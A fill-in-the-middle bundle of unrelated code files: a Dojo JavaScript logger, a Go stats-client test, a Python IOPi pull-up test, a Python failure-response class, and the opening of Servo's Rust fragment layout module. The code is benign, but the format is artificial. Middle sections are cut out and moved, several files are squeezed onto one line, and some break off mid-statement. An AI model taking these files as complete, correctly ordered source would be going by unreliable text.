	var tgt = dojo.logging.LogHandler.prototype;
	var src = dojo.logging.Logger.prototype;
	for(var x=0; x<names.length; x++){
		tgt[names[x]] = src[names[x]];
	}
})(); // end globals protection closure

dojo.logging.log = new dojo.logging.Logger();

// an associative array of logger objects. This object inherits from
// a list of level names with their associated numeric levels
dojo.logging.log.levels = [
	{"name": "DEBUG", "level": 1},
	{"name": "INFO", "level": 2},
	{"name": "WARNING", "level": 3},
	{"name": "ERROR", "level": 4},
	{"name": "CRITICAL", "level": 5}
];

dojo.logging.log.loggers = {};

dojo.logging.log.getLogger = function(/*string*/name){
	// summary:
	//		returns a named dojo.logging.Logger instance. If one is not already
	//		available with that name in the global map, one is created and
	//		returned.
	if(!this.loggers[name]){
		this.loggers[name] = new dojo.logging.Logger();
		this.loggers[name].parent = this;
	}
	return this.loggers[name]; // dojo.logging.Logger
}

dojo.logging.log.getLevelName = function(/*integer*/lvl){
	// summary: turns integer logging level into a human-friendly name
	for(var x=0; x<this.levels.length; x++){
		if(this.levels[x].level == lvl){
			return this.levels[x].name; // string
		}
	}
	return null;
}

dojo.logging.log.getLevel = function(/*string*/name){
	// summary: name->integer conversion for log levels
	for(var x=0; x<this.levels.length; x++){
		if(this.levels[x].name.toUpperCase() == name.toUpperCase()){
			return this.levels[x].level; // integer
		}
	}
	return null;
}

// a default handler class, it simply saves all of the handle()'d records in
// memory. Useful for attaching to with dojo.event.connect()
dojo.declare("dojo.logging.MemoryLogHandler",
	dojo.logging.LogHandler,
{
	initializer: function(level, recordsToKeep, postType, postInterval){
		// mixin style inheritance
		dojo.logging.LogHandler.call(this, level);
		// default is unlimited
		this.numRecords = (typeof djConfig['loggingNumRecords'] != 'undefined') ?
			djConfig['loggingNumRecords'] : ((recordsToKeep) ? recordsToKeep : -1);
		// 0=count, 1=time, -1=don't post TODO: move this to a better location for prefs
		this.postType = (typeof djConfig['loggingPostType'] != 'undefined') ?
			djConfig['loggingPostType'] : ( postType || -1);
		// milliseconds for time, integer for number of records, -1 for non-posting,
		this.postInterval = (typeof djConfig['loggingPostInterval'] != 'undefined') ?
djConfig['loggingPostInterval'] : ( postInterval || -1);
	},

	emit: function(record){
		if(!djConfig.isDebug){ return; }
		var logStr = String(dojo.log.getLevelName(record.level)+": "
			+record.time.toLocaleTimeString())+": "+record.message;
		if(!dj_undef("println", dojo.hostenv)){
			dojo.hostenv.println(logStr, record.msgArgs);
		}

		this.data.push(record);
		if(this.numRecords != -1){
			while(this.data.length>this.numRecords){
				this.data.shift();
			}
		}
	}
	}
);

dojo.logging.logQueueHandler = new dojo.logging.MemoryLogHandler(0,50,0,10000);

dojo.logging.log.addHandler(dojo.logging.logQueueHandler);
dojo.log = dojo.logging.log;<|fim▁end|>
// A simple data structure class that stores information for and about // a logged event. Objects of this type are created automatically when
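A small usage sketch for the dojo.logging API assembled in the Logger.js record above; it drives the root logger directly, and the messages are illustrative only.

// Illustrative use of the dojo.logging API defined above; the log messages
// are invented for the example.
var log = dojo.logging.log;
log.setLevel(log.getLevel("WARNING"));

log.debug("dropped: below the WARNING cutoff");
log.warn("emitted: at or above the cutoff");

try {
	nonexistentFunction(); // deliberately throws
} catch(e) {
	// Logs at the ERROR level; the final `true` squelches the rethrow.
	log.exception("call failed", e, true);
}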
<|file_name|>statgrabber_test.go<|end_file_name|><|fim▁begin|>package gostatgrabber

import (
	"bytes"
	"fmt"
	"net"
	"testing"
	"time"
)

func TestCounter(t *testing.T) {
	receiveChan, err := statReceiver(t)
	if err != nil {
		t.Fatalf("statReceiver() %s", err)
	}
	<-receiveChan

	s, err := NewStatGrabber()
	if err != nil {
		t.Fatalf("NewStatGrabber() %s", err)
	}

	tag := "pork"
	s.Count(tag)

	result := <-receiveChan
	t.Logf("TestCounter received '%s'", result)
	if !bytes.Equal(result, []byte(tag)) {
		t.Fatalf("unexpected result '%q' expecting '%q' %d", result, tag,
			bytes.Compare(result, []byte(tag)))
	}
}

func TestAverage(t *testing.T) {
	receiveChan, err := statReceiver(t)
	if err != nil {
		t.Fatalf("statReceiver() %s", err)
	}
	<-receiveChan

	s, err := NewStatGrabber()
	if err != nil {
		t.Fatalf("NewStatGrabber() %s", err)
	}

	tag := "pork"
	s.Average(tag, 42)

	result := <-receiveChan
	t.Logf("TestAverage received '%s'", result)
	if !bytes.Equal(result, []byte("pork 42")) {
		t.Fatalf("unexpected result '%q' %d", result,
			bytes.Compare(result, []byte("pork 42")))
	}
}

func TestAccumulate(t *testing.T) {
	receiveChan, err := statReceiver(t)
	if err != nil {
		t.Fatalf("statReceiver() %s", err)
	}
	<-receiveChan

	s, err := NewStatGrabber()
	if err != nil {
		t.Fatalf("NewStatGrabber() %s", err)
	}

	tag := "pork"
	s.Accumulate(tag, 42)

	result := <-receiveChan
	t.Logf("TestAccumulate received '%s'", result)
	if !bytes.Equal(result, []byte("pork +42")) {
		t.Fatalf("unexpected result '%q' %d", result,
			bytes.Compare(result, []byte("pork +42")))<|fim▁hole|>
<|file_name|>get_bus_pullups.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python """ ================================================ ABElectronics IO Pi Tests | test get_bus_pullups function Requires python smbus to be installed For Python 2 install with: sudo apt-get install python-smbus For Python 3 install with: sudo apt-get install python3-smbus run with: python3 get_bus_pullups.py ================================================ This test validates the get_bus_pullups function in the IOPi class. === Expected Result ============================ > Console Output: Test Passed """ from __future__ import absolute_import, division, print_function, \ unicode_literals try: import sys sys.path.append("..") from IOPi import IOPi except ImportError: raise ImportError("Failed to import IOPi library") def main(): """ Main program function """<|fim▁hole|> passed = True iopi = IOPi(0x20, False) # new iopi object without initialisation for a in range(1, 65536): iopi.set_bus_pullups(a) x = iopi.get_bus_pullups() if x != a: passed = False break iopi.set_bus_pullups(a) x = iopi.get_bus_pullups() if x != a: passed = False break if passed is False: print("Test Failed") else: print("Test Passed") if __name__ == "__main__": main()<|fim▁end|>
<|file_name|>response_failure.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- # # Copyright (C) 2021 Red Hat, Inc. # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. import traceback from typing import Any, Optional, List from hotness.exceptions import BaseHotnessException from hotness.requests import Request from hotness.responses import Response class ResponseFailure(Response): """ Class that represents failure response returned from use case. It is send when some exception happen during the use case. Defines constants for error types. Attributes: type: Type of the failure. message: Error message. traceback: Exception traceback as string. use_case_value: Partial use case output from Exception, if provided. """ VALIDATOR_ERROR = "ValidatorError" BUILDER_ERROR = "BuilderError" DATABASE_ERROR = "DatabaseError" NOTIFIER_ERROR = "NotifierError" PATCHER_ERROR = "PatcherError" INVALID_REQUEST_ERROR = "InvalidRequestError" def __init__(self, type: str, message: Any) -> None: """ Class constructor. """ self.type = type self.message = self._format_message(message) self.traceback = self._get_stack_trace(message) self.use_case_value = self._get_value(message) def _get_value(self, message: Any) -> Optional[dict]: """ Retrieves the use case value information from Exception, otherwise just returns empty dict. Params: message: Input to retrieve use case value from Returns: Value if message is Exception, otherwise None """ value = None if isinstance(message, BaseHotnessException): value = message.value return value def _get_stack_trace(self, message: Any) -> List[str]: """ Retrieves the stack trace information from Exception, otherwise just returns empty list. Params: message: Input to retrieve stack trace from Returns: Stack trace if message is Exception, otherwise empty string """ stack_trace = [] if isinstance(message, Exception): stack_trace = traceback.format_tb(message.__traceback__) return stack_trace def _format_message(self, message: Any) -> Any: """ Formats the input message if the message inherits from Exception, otherwise just return it back. Params: message: Input message to format Returns: String if exception, otherwise return the same object we received. """ if isinstance(message, Exception): return "{}: {}".format(message.__class__.__name__, "{}".format(message)) return message @property def value(self):<|fim▁hole|> """ Returns the dict representation of the failure response. """ return { "type": self.type, "message": self.message, "use_case_value": self.use_case_value, } def __bool__(self) -> bool: """ Boolean representation of response. """ return False @classmethod def validator_error(cls, message: Any) -> "ResponseFailure": """ Creates response for validator failure. 
Params: message: Message to add to this error Returns: ResponseFailure object """ response = ResponseFailure( type=ResponseFailure.VALIDATOR_ERROR, message=message ) return response @classmethod def builder_error(cls, message: Any) -> "ResponseFailure": """ Creates response for builder failure. Params: message: Message to add to this error Returns: ResponseFailure object """ response = ResponseFailure(type=ResponseFailure.BUILDER_ERROR, message=message) return response @classmethod def database_error(cls, message: Any) -> "ResponseFailure": """ Creates response for database failure. Params: message: Message to add to this error Returns: ResponseFailure object """ response = ResponseFailure(type=ResponseFailure.DATABASE_ERROR, message=message) return response @classmethod def notifier_error(cls, message: Any) -> "ResponseFailure": """ Creates response for notifier failure. Params: message: Message to add to this error Returns: ResponseFailure object """ response = ResponseFailure(type=ResponseFailure.NOTIFIER_ERROR, message=message) return response @classmethod def patcher_error(cls, message: Any) -> "ResponseFailure": """ Creates response for patcher failure. Params: message: Message to add to this error Returns: ResponseFailure object """ response = ResponseFailure(type=ResponseFailure.PATCHER_ERROR, message=message) return response @classmethod def invalid_request_error(cls, request: Request) -> "ResponseFailure": """ Creates response for invalid request failure. Params: request: Invalid request to add to this error Returns: ResponseFailure object """ response = ResponseFailure( type=ResponseFailure.INVALID_REQUEST_ERROR, message=str(request.errors) ) return response<|fim▁end|>
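A short behavioral sketch of the ResponseFailure helpers defined above, using only names that appear in the file; the exception text is invented for illustration.

# Behavioral sketch of ResponseFailure; the exception text is invented.
try:
    raise ValueError("upstream service unreachable")
except ValueError as exc:
    response = ResponseFailure.notifier_error(exc)

assert bool(response) is False                   # failure responses are falsy
assert response.value["type"] == "NotifierError"
# Exceptions are formatted as "<ClassName>: <text>" by _format_message():
assert response.value["message"] == "ValueError: upstream service unreachable"
assert response.value["use_case_value"] is None  # plain ValueError carries none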
<|file_name|>fragment.rs<|end_file_name|><|fim▁begin|>/* This Source Code Form is subject to the terms of the Mozilla Public * License, v. 2.0. If a copy of the MPL was not distributed with this * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ //! The `Fragment` type, which represents the leaves of the layout tree. #![deny(unsafe_code)] use ServoArc; use app_units::Au; use canvas_traits::canvas::CanvasMsg; use context::{LayoutContext, with_thread_local_font_context}; use euclid::{Transform3D, Point2D, Vector2D, Rect, Size2D}; use floats::ClearType; use flow::{self, ImmutableFlowUtils}; use flow_ref::FlowRef; use gfx; use gfx::display_list::{BLUR_INFLATION_FACTOR, OpaqueNode}; use gfx::text::glyph::ByteIndex; use gfx::text::text_run::{TextRun, TextRunSlice}; use gfx_traits::StackingContextId; use inline::{InlineFragmentNodeFlags, InlineFragmentContext, InlineFragmentNodeInfo}; use inline::{InlineMetrics, LineMetrics}; use ipc_channel::ipc::IpcSender; #[cfg(debug_assertions)] use layout_debug; use model::{self, IntrinsicISizes, IntrinsicISizesContribution, MaybeAuto, SizeConstraint}; use model::style_length; use msg::constellation_msg::{BrowsingContextId, PipelineId}; use net_traits::image::base::{Image, ImageMetadata}; use net_traits::image_cache::{ImageOrMetadataAvailable, UsePlaceholder}; use range::*; use script_layout_interface::{HTMLCanvasData, HTMLCanvasDataSource}; use script_layout_interface::SVGSVGData; use script_layout_interface::wrapper_traits::{PseudoElementType, ThreadSafeLayoutElement, ThreadSafeLayoutNode}; use serde::ser::{Serialize, SerializeStruct, Serializer}; use servo_url::ServoUrl; use std::{f32, fmt}; use std::borrow::ToOwned; use std::cmp::{Ordering, max, min}; use std::collections::LinkedList; use std::sync::{Arc, Mutex}; use style::computed_values::{border_collapse, box_sizing, clear, color, display, mix_blend_mode}; use style::computed_values::{overflow_wrap, overflow_x, position, text_decoration_line}; use style::computed_values::{transform_style, white_space, word_break}; use style::computed_values::content::ContentItem; use style::logical_geometry::{Direction, LogicalMargin, LogicalRect, LogicalSize, WritingMode}; use style::properties::ComputedValues; use style::selector_parser::RestyleDamage; use style::servo::restyle_damage::ServoRestyleDamage; use style::str::char_is_whitespace; use style::values::{self, Either, Auto}; use style::values::computed::{Length, LengthOrPercentage, LengthOrPercentageOrAuto}; use style::values::generics::box_::VerticalAlign; use style::values::generics::transform; use text; use text::TextRunScanner; use webrender_api; use wrapper::ThreadSafeLayoutNodeHelpers; // From gfxFontConstants.h in Firefox. static FONT_SUBSCRIPT_OFFSET_RATIO: f32 = 0.20; static FONT_SUPERSCRIPT_OFFSET_RATIO: f32 = 0.34; // https://drafts.csswg.org/css-images/#default-object-size static DEFAULT_REPLACED_WIDTH: i32 = 300; static DEFAULT_REPLACED_HEIGHT: i32 = 150; /// Fragments (`struct Fragment`) are the leaves of the layout tree. They cannot position /// themselves. In general, fragments do not have a simple correspondence with CSS fragments in the /// specification: /// /// * Several fragments may correspond to the same CSS box or DOM node. For example, a CSS text box /// broken across two lines is represented by two fragments. /// /// * Some CSS fragments are not created at all, such as some anonymous block fragments induced by /// inline fragments with block-level sibling fragments. 
In that case, Servo uses an `InlineFlow` /// with `BlockFlow` siblings; the `InlineFlow` is block-level, but not a block container. It is /// positioned as if it were a block fragment, but its children are positioned according to /// inline flow. /// /// A `SpecificFragmentInfo::Generic` is an empty fragment that contributes only borders, margins, /// padding, and backgrounds. It is analogous to a CSS nonreplaced content box. /// /// A fragment's type influences how its styles are interpreted during layout. For example, /// replaced content such as images are resized differently from tables, text, or other content. /// Different types of fragments may also contain custom data; for example, text fragments contain /// text. /// /// Do not add fields to this structure unless they're really really mega necessary! Fragments get /// moved around a lot and thus their size impacts performance of layout quite a bit. /// /// FIXME(#2260, pcwalton): This can be slimmed down some by (at least) moving `inline_context` /// to be on `InlineFlow` only. #[derive(Clone)] pub struct Fragment { /// An opaque reference to the DOM node that this `Fragment` originates from. pub node: OpaqueNode, /// The CSS style of this fragment. pub style: ServoArc<ComputedValues>, /// The CSS style of this fragment when it's selected pub selected_style: ServoArc<ComputedValues>, /// The position of this fragment relative to its owning flow. The size includes padding and /// border, but not margin. /// /// NB: This does not account for relative positioning. /// NB: Collapsed borders are not included in this. pub border_box: LogicalRect<Au>, /// The sum of border and padding; i.e. the distance from the edge of the border box to the /// content edge of the fragment. pub border_padding: LogicalMargin<Au>, /// The margin of the content box. pub margin: LogicalMargin<Au>, /// Info specific to the kind of fragment. Keep this enum small. pub specific: SpecificFragmentInfo, /// Holds the style context information for fragments that are part of an inline formatting /// context. pub inline_context: Option<InlineFragmentContext>, /// How damaged this fragment is since last reflow. pub restyle_damage: RestyleDamage, /// The pseudo-element that this fragment represents. pub pseudo: PseudoElementType<()>, /// Various flags for this fragment. pub flags: FragmentFlags, /// A debug ID that is consistent for the life of this fragment (via transform etc). /// This ID should not be considered stable across multiple layouts or fragment /// manipulations. debug_id: DebugId, /// The ID of the StackingContext that contains this fragment. This is initialized /// to 0, but it assigned during the collect_stacking_contexts phase of display /// list construction. pub stacking_context_id: StackingContextId, } impl Serialize for Fragment { fn serialize<S: Serializer>(&self, serializer: S) -> Result<S::Ok, S::Error> { let mut serializer = serializer.serialize_struct("fragment", 3)?; serializer.serialize_field("id", &self.debug_id)?; serializer.serialize_field("border_box", &self.border_box)?; serializer.serialize_field("margin", &self.margin)?; serializer.end() } } /// Info specific to the kind of fragment. /// /// Keep this enum small. As in, no more than one word. Or pcwalton will yell at you. #[derive(Clone)] pub enum SpecificFragmentInfo { Generic, /// A piece of generated content that cannot be resolved into `ScannedText` until the generated /// content resolution phase (e.g. an ordered list item marker). 
GeneratedContent(Box<GeneratedContentInfo>), Iframe(IframeFragmentInfo), Image(Box<ImageFragmentInfo>), Canvas(Box<CanvasFragmentInfo>), Svg(Box<SvgFragmentInfo>), /// A hypothetical box (see CSS 2.1 § 10.3.7) for an absolutely-positioned block that was /// declared with `display: inline;`. InlineAbsoluteHypothetical(InlineAbsoluteHypotheticalFragmentInfo), InlineBlock(InlineBlockFragmentInfo), /// An inline fragment that establishes an absolute containing block for its descendants (i.e. /// a positioned inline fragment). InlineAbsolute(InlineAbsoluteFragmentInfo), ScannedText(Box<ScannedTextFragmentInfo>), Table, TableCell, TableColumn(TableColumnFragmentInfo), TableRow, TableWrapper, Multicol, MulticolColumn, UnscannedText(Box<UnscannedTextFragmentInfo>), /// A container for a fragment that got truncated by text-overflow. /// "Totally truncated fragments" are not rendered at all. /// Text fragments may be partially truncated (in which case this renders like a text fragment). /// Other fragments can only be totally truncated or not truncated at all. TruncatedFragment(Box<TruncatedFragmentInfo>), } impl SpecificFragmentInfo { fn restyle_damage(&self) -> RestyleDamage { let flow = match *self { SpecificFragmentInfo::Canvas(_) | SpecificFragmentInfo::GeneratedContent(_) | SpecificFragmentInfo::Iframe(_) | SpecificFragmentInfo::Image(_) | SpecificFragmentInfo::ScannedText(_) | SpecificFragmentInfo::Svg(_) | SpecificFragmentInfo::Table | SpecificFragmentInfo::TableCell | SpecificFragmentInfo::TableColumn(_) | SpecificFragmentInfo::TableRow | SpecificFragmentInfo::TableWrapper | SpecificFragmentInfo::Multicol | SpecificFragmentInfo::MulticolColumn | SpecificFragmentInfo::UnscannedText(_) | SpecificFragmentInfo::TruncatedFragment(_) | SpecificFragmentInfo::Generic => return RestyleDamage::empty(), SpecificFragmentInfo::InlineAbsoluteHypothetical(ref info) => &info.flow_ref, SpecificFragmentInfo::InlineAbsolute(ref info) => &info.flow_ref, SpecificFragmentInfo::InlineBlock(ref info) => &info.flow_ref, }; flow::base(&**flow).restyle_damage } pub fn get_type(&self) -> &'static str { match *self { SpecificFragmentInfo::Canvas(_) => "SpecificFragmentInfo::Canvas", SpecificFragmentInfo::Generic => "SpecificFragmentInfo::Generic", SpecificFragmentInfo::GeneratedContent(_) => "SpecificFragmentInfo::GeneratedContent", SpecificFragmentInfo::Iframe(_) => "SpecificFragmentInfo::Iframe", SpecificFragmentInfo::Image(_) => "SpecificFragmentInfo::Image", SpecificFragmentInfo::InlineAbsolute(_) => "SpecificFragmentInfo::InlineAbsolute", SpecificFragmentInfo::InlineAbsoluteHypothetical(_) => { "SpecificFragmentInfo::InlineAbsoluteHypothetical" } SpecificFragmentInfo::InlineBlock(_) => "SpecificFragmentInfo::InlineBlock", SpecificFragmentInfo::ScannedText(_) => "SpecificFragmentInfo::ScannedText", SpecificFragmentInfo::Svg(_) => "SpecificFragmentInfo::Svg", SpecificFragmentInfo::Table => "SpecificFragmentInfo::Table", SpecificFragmentInfo::TableCell => "SpecificFragmentInfo::TableCell", SpecificFragmentInfo::TableColumn(_) => "SpecificFragmentInfo::TableColumn", SpecificFragmentInfo::TableRow => "SpecificFragmentInfo::TableRow", SpecificFragmentInfo::TableWrapper => "SpecificFragmentInfo::TableWrapper", SpecificFragmentInfo::Multicol => "SpecificFragmentInfo::Multicol", SpecificFragmentInfo::MulticolColumn => "SpecificFragmentInfo::MulticolColumn", SpecificFragmentInfo::UnscannedText(_) => "SpecificFragmentInfo::UnscannedText", SpecificFragmentInfo::TruncatedFragment(_) => "SpecificFragmentInfo::TruncatedFragment" 
} } } impl fmt::Debug for SpecificFragmentInfo { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match *self { SpecificFragmentInfo::ScannedText(ref info) => write!(f, "{:?}", info.text()), SpecificFragmentInfo::UnscannedText(ref info) => write!(f, "{:?}", info.text), _ => Ok(()) } } } /// Information for generated content. #[derive(Clone)] pub enum GeneratedContentInfo { ListItem, ContentItem(ContentItem), /// Placeholder for elements with generated content that did not generate any fragments. Empty, } /// A hypothetical box (see CSS 2.1 § 10.3.7) for an absolutely-positioned block that was declared /// with `display: inline;`. /// /// FIXME(pcwalton): Stop leaking this `FlowRef` to layout; that is not memory safe because layout /// can clone it. #[derive(Clone)] pub struct InlineAbsoluteHypotheticalFragmentInfo { pub flow_ref: FlowRef, } impl InlineAbsoluteHypotheticalFragmentInfo { pub fn new(flow_ref: FlowRef) -> InlineAbsoluteHypotheticalFragmentInfo { InlineAbsoluteHypotheticalFragmentInfo { flow_ref: flow_ref, } } } /// A fragment that represents an inline-block element. /// /// FIXME(pcwalton): Stop leaking this `FlowRef` to layout; that is not memory safe because layout /// can clone it. #[derive(Clone)] pub struct InlineBlockFragmentInfo { pub flow_ref: FlowRef, } impl InlineBlockFragmentInfo { pub fn new(flow_ref: FlowRef) -> InlineBlockFragmentInfo { InlineBlockFragmentInfo { flow_ref: flow_ref, } } } /// An inline fragment that establishes an absolute containing block for its descendants (i.e. /// a positioned inline fragment). /// /// FIXME(pcwalton): Stop leaking this `FlowRef` to layout; that is not memory safe because layout /// can clone it. #[derive(Clone)] pub struct InlineAbsoluteFragmentInfo { pub flow_ref: FlowRef, } impl InlineAbsoluteFragmentInfo { pub fn new(flow_ref: FlowRef) -> InlineAbsoluteFragmentInfo { InlineAbsoluteFragmentInfo { flow_ref: flow_ref, } } } #[derive(Clone)] pub enum CanvasFragmentSource { WebGL(webrender_api::ImageKey), Image(Option<Arc<Mutex<IpcSender<CanvasMsg>>>>) } #[derive(Clone)] pub struct CanvasFragmentInfo { pub source: CanvasFragmentSource, pub dom_width: Au, pub dom_height: Au, } impl CanvasFragmentInfo { pub fn new(data: HTMLCanvasData) -> CanvasFragmentInfo { let source = match data.source { HTMLCanvasDataSource::WebGL(texture_id) => { CanvasFragmentSource::WebGL(texture_id) }, HTMLCanvasDataSource::Image(ipc_sender) => { CanvasFragmentSource::Image(ipc_sender.map(|renderer| Arc::new(Mutex::new(renderer)))) } }; CanvasFragmentInfo { source: source, dom_width: Au::from_px(data.width as i32), dom_height: Au::from_px(data.height as i32), } } } #[derive(Clone)] pub struct SvgFragmentInfo { pub dom_width: Au, pub dom_height: Au, } impl SvgFragmentInfo { pub fn new(data: SVGSVGData) -> SvgFragmentInfo { SvgFragmentInfo { dom_width: Au::from_px(data.width as i32), dom_height: Au::from_px(data.height as i32), } } } /// A fragment that represents a replaced content image and its accompanying borders, shadows, etc. #[derive(Clone)] pub struct ImageFragmentInfo { pub image: Option<Arc<Image>>, pub metadata: Option<ImageMetadata>, } impl ImageFragmentInfo { /// Creates a new image fragment from the given URL and local image cache. /// /// FIXME(pcwalton): The fact that image fragments store the cache in the fragment makes little /// sense to me. 
pub fn new<N: ThreadSafeLayoutNode>(url: Option<ServoUrl>, node: &N, layout_context: &LayoutContext) -> ImageFragmentInfo { let image_or_metadata = url.and_then(|url| { layout_context.get_or_request_image_or_meta(node.opaque(), url, UsePlaceholder::Yes) }); let (image, metadata) = match image_or_metadata { Some(ImageOrMetadataAvailable::ImageAvailable(i, _)) => { (Some(i.clone()), Some(ImageMetadata { height: i.height, width: i.width } )) } Some(ImageOrMetadataAvailable::MetadataAvailable(m)) => { (None, Some(m)) } None => { (None, None) } }; ImageFragmentInfo { image: image, metadata: metadata, } } pub fn tile_image_round(position: &mut Au, size: &mut Au, absolute_anchor_origin: Au, image_size: &mut Au) { if *size == Au(0) || *image_size == Au(0) { *position = Au(0); *size =Au(0); return; } let number_of_tiles = (size.to_f32_px() / image_size.to_f32_px()).round().max(1.0); *image_size = *size / (number_of_tiles as i32); ImageFragmentInfo::tile_image(position, size, absolute_anchor_origin, *image_size); } pub fn tile_image_spaced(position: &mut Au, size: &mut Au, tile_spacing: &mut Au, absolute_anchor_origin: Au, image_size: Au) { if *size == Au(0) || image_size == Au(0) { *position = Au(0); *size = Au(0); *tile_spacing = Au(0); return; } // Per the spec, if the space available is not enough for two images, just tile as // normal but only display a single tile. if image_size * 2 >= *size { ImageFragmentInfo::tile_image(position, size, absolute_anchor_origin, image_size); *tile_spacing = Au(0); *size = image_size; return; } // Take the box size, remove room for two tiles on the edges, and then calculate how many // other tiles fit in between them. let size_remaining = *size - (image_size * 2); let num_middle_tiles = (size_remaining.to_f32_px() / image_size.to_f32_px()).floor() as i32; // Allocate the remaining space as padding between tiles. background-position is ignored // as per the spec, so the position is just the box origin. We are also ignoring // background-attachment here, which seems unspecced when combined with // background-repeat: space. let space_for_middle_tiles = image_size * num_middle_tiles; *tile_spacing = (size_remaining - space_for_middle_tiles) / (num_middle_tiles + 1); } /// Tile an image pub fn tile_image(position: &mut Au, size: &mut Au, absolute_anchor_origin: Au, image_size: Au) { // Avoid division by zero below! if image_size == Au(0) { return } let delta_pixels = absolute_anchor_origin - *position; let image_size_px = image_size.to_f32_px(); let tile_count = ((delta_pixels.to_f32_px() + image_size_px - 1.0) / image_size_px).floor(); let offset = image_size * (tile_count as i32); let new_position = absolute_anchor_origin - offset; *size = *position - new_position + *size; *position = new_position; } } /// A fragment that represents an inline frame (iframe). This stores the frame ID so that the /// size of this iframe can be communicated via the constellation to the iframe's own layout thread. #[derive(Clone)] pub struct IframeFragmentInfo { /// The frame ID of this iframe. None if there is no nested browsing context. pub browsing_context_id: Option<BrowsingContextId>, /// The pipelineID of this iframe. None if there is no nested browsing context. pub pipeline_id: Option<PipelineId>, } impl IframeFragmentInfo { /// Creates the information specific to an iframe fragment. 
pub fn new<N: ThreadSafeLayoutNode>(node: &N) -> IframeFragmentInfo { let browsing_context_id = node.iframe_browsing_context_id(); let pipeline_id = node.iframe_pipeline_id(); IframeFragmentInfo { browsing_context_id: browsing_context_id, pipeline_id: pipeline_id, } } } /// A scanned text fragment represents a single run of text with a distinct style. A `TextFragment` /// may be split into two or more fragments across line breaks. Several `TextFragment`s may /// correspond to a single DOM text node. Split text fragments are implemented by referring to /// subsets of a single `TextRun` object. #[derive(Clone)] pub struct ScannedTextFragmentInfo { /// The text run that this represents. pub run: Arc<TextRun>, /// The intrinsic size of the text fragment. pub content_size: LogicalSize<Au>, /// The byte offset of the insertion point, if any. pub insertion_point: Option<ByteIndex>, /// The range within the above text run that this represents. pub range: Range<ByteIndex>, /// The endpoint of the above range, including whitespace that was stripped out. This exists /// so that we can restore the range to its original value (before line breaking occurred) when /// performing incremental reflow. pub range_end_including_stripped_whitespace: ByteIndex, pub flags: ScannedTextFlags, } bitflags! { pub struct ScannedTextFlags: u8 { /// Whether a line break is required after this fragment if wrapping on newlines (e.g. if /// `white-space: pre` is in effect). const REQUIRES_LINE_BREAK_AFTERWARD_IF_WRAPPING_ON_NEWLINES = 0x01; /// Is this fragment selected? const SELECTED = 0x02; } } impl ScannedTextFragmentInfo { /// Creates the information specific to a scanned text fragment from a range and a text run. pub fn new(run: Arc<TextRun>, range: Range<ByteIndex>, content_size: LogicalSize<Au>, insertion_point: Option<ByteIndex>, flags: ScannedTextFlags) -> ScannedTextFragmentInfo { ScannedTextFragmentInfo { run: run, range: range, insertion_point: insertion_point, content_size: content_size, range_end_including_stripped_whitespace: range.end(), flags: flags, } } pub fn text(&self) -> &str { &self.run.text[self.range.begin().to_usize() .. self.range.end().to_usize()] } pub fn requires_line_break_afterward_if_wrapping_on_newlines(&self) -> bool { self.flags.contains(ScannedTextFlags::REQUIRES_LINE_BREAK_AFTERWARD_IF_WRAPPING_ON_NEWLINES) } pub fn selected(&self) -> bool { self.flags.contains(ScannedTextFlags::SELECTED) } } /// Describes how to split a fragment. This is used during line breaking as part of the return /// value of `find_split_info_for_inline_size()`. #[derive(Clone, Debug)] pub struct SplitInfo { // TODO(bjz): this should only need to be a single character index, but both values are // currently needed for splitting in the `inline::try_append_*` functions. pub range: Range<ByteIndex>, pub inline_size: Au, } impl SplitInfo { fn new(range: Range<ByteIndex>, info: &ScannedTextFragmentInfo) -> SplitInfo { let inline_size = info.run.advance_for_range(&range); SplitInfo { range: range, inline_size: inline_size, } } } /// Describes how to split a fragment into two. This contains up to two `SplitInfo`s. pub struct SplitResult { /// The part of the fragment that goes on the first line. pub inline_start: Option<SplitInfo>, /// The part of the fragment that goes on the second line. pub inline_end: Option<SplitInfo>, /// The text run which is being split. pub text_run: Arc<TextRun>, } /// Describes how a fragment should be truncated. 
struct TruncationResult { /// The part of the fragment remaining after truncation. split: SplitInfo, /// The text run which is being truncated. text_run: Arc<TextRun>, } /// Data for an unscanned text fragment. Unscanned text fragments are the results of flow /// construction that have not yet had their inline-size determined. #[derive(Clone)] pub struct UnscannedTextFragmentInfo { /// The text inside the fragment. pub text: Box<str>, /// The selected text range. An empty range represents the insertion point. pub selection: Option<Range<ByteIndex>>, } impl UnscannedTextFragmentInfo { /// Creates a new instance of `UnscannedTextFragmentInfo` from the given text. #[inline] pub fn new(text: String, selection: Option<Range<ByteIndex>>) -> UnscannedTextFragmentInfo { UnscannedTextFragmentInfo { text: text.into_boxed_str(), selection: selection, } } } /// A fragment that represents a table column. #[derive(Clone, Copy)] pub struct TableColumnFragmentInfo { /// the number of columns a <col> element should span pub span: u32, } impl TableColumnFragmentInfo { /// Create the information specific to an table column fragment. pub fn new<N: ThreadSafeLayoutNode>(node: &N) -> TableColumnFragmentInfo { let element = node.as_element().unwrap(); let span = element.get_attr(&ns!(), &local_name!("span")) .and_then(|string| string.parse().ok()) .unwrap_or(0); TableColumnFragmentInfo { span: span, } } } /// A wrapper for fragments that have been truncated by the `text-overflow` property. /// This may have an associated text node, or, if the fragment was completely truncated, /// it may act as an invisible marker for incremental reflow. #[derive(Clone)] pub struct TruncatedFragmentInfo { pub text_info: Option<ScannedTextFragmentInfo>, pub full: Fragment, } impl Fragment { /// Constructs a new `Fragment` instance. pub fn new<N: ThreadSafeLayoutNode>(node: &N, specific: SpecificFragmentInfo, ctx: &LayoutContext) -> Fragment { let shared_context = ctx.shared_context(); let style = node.style(shared_context); let writing_mode = style.writing_mode; let mut restyle_damage = node.restyle_damage(); restyle_damage.remove(ServoRestyleDamage::RECONSTRUCT_FLOW); Fragment { node: node.opaque(), style: style, selected_style: node.selected_style(), restyle_damage: restyle_damage, border_box: LogicalRect::zero(writing_mode), border_padding: LogicalMargin::zero(writing_mode), margin: LogicalMargin::zero(writing_mode), specific: specific, 